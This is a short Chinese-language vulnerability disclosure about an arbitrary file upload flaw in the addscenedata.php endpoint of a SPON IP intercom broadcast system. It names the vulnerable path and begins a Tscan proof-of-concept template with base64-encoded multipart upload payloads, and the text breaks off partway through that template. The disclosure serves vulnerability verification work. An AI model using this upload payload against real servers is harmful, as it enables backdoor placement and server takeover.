0x01漏洞描述
此系统addscenedata.php接口存在任意文件上传漏洞,恶意攻击者可能会上传恶意的后门文件,使服务器失陷
0x02漏洞复现
(1)payload利用地址:
/php/addscenedata.php
(2)文件上传POC(/images/scene/xxx.txt):
0x03POC使用(Tscan验证)
name: spon IP网络对讲广播系统任意文件上传漏洞
set:
a4: randomLowercase(8)
a5: randomLowercase(7)
a1: base64Decode(b'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5NEx1b0JScFRpVkJvOWNJUQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1cGxvYWQiOyBmaWxlbmFtZT0iCg==')
a2: base64Decode(b'LnR4dCINCkNvbnRlbnQtVHlwZTogd